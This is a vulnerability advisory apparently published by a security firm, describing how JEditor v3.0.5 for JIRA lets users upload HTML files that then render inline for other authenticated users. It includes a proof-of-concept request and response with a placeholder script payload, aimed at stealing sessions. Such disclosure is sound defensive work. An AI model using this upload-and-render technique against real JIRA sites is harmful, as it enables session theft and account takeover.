Cross Site Request Forgery
Introduction
Our Security Research Team at [exploitsecurity.io] uncovered a CSRF vulnerability that allows an attacker to add a URL/Link (to an existing issue) that can cause forgery of a request to an out-of-origin domain. This in turn may allow for a forged request that can be invoked in the context of an authenticated user, leading to stealing of session tokens and account takeover.
JEditor v3.0.5 allows for upload of files of various file extension types, one of which is '.HTML'. JEditor is utilised by JIRA for its file upload functionality. Using this functionality an attacker is able to upload malicious content. Once the malicious content is uploaded a subsequent request can be made for the content which allows for the inline displaying and rendering of the content within the context of any authenticated user's browser. This may allow for an attacker to forge a malicious request, on behalf of any authenticated user
Affected Product Overview
JEditor v3.0.5 - WYSIWIG Editor for JIRA
Simple yet powerful rich text editor for JIRA. Import HTML emails, paste rich contents, create templates and pre-populate fields.
Requirements
This is an authenticated attack and requires an authenticated user to interact with the embedded link/URL.
Responsible Disclosure
The Security Researcher at [exploitsecurity.io], reached out to the vendor to ensure that a patch was released prior to public disclosure. However, as of the time of this disclosure, no patch has been applied.
Proof of Concept
Example HTTP Request
GET /plugins/servlet/jeditor_file_provider?imgId=ckupload201906162566696393384747423&fileName=C%3A%5Ctemp%5CPOC.html HTTP/1.1
Host: <vulnerable host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0)
Accept: text/html,application/xhtml_xml,application/xml;q=0.9,*/*;q=0.8
Accept-Langauge: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<vulnerable host>/secure/Dashboard.jspa
DNT: 1
Connection: close
Cookie: atlassian.xsrf.token=BNXD-VY4I-RCJA-J3YA_34d13dd7fae0f32023fc89838ldc0b6c35991382_lin; JSESSION=42E9F5581BAE499E3E9E45B9D44E6F3C
Upgrade-Insecure-Requests: 1
Example HTTP Response
HTTP/1.1 200
Server: nginx/1.10.2
Date: Sun, 16 Jun 2019 03:06:10 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
X-AREQUESTID: 786x226666x1
X-ASESSIONID: pn6xpm
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-ASEN: SEN-2322842
X-Seraph-LoginReason: OK
X-AUSERNAME:
Content-Disposition: inline; filename="C:\temp\POC.html"
Vary: User-Agent
Content-Length: 236
<html>
<head>
<img src="http://{insert external image location here}">
<script>{JS Payload of any description}</script>
</head>
<body>
<h1>
Welcome to the Jungle !
</h1>
</body>
</html>
Comments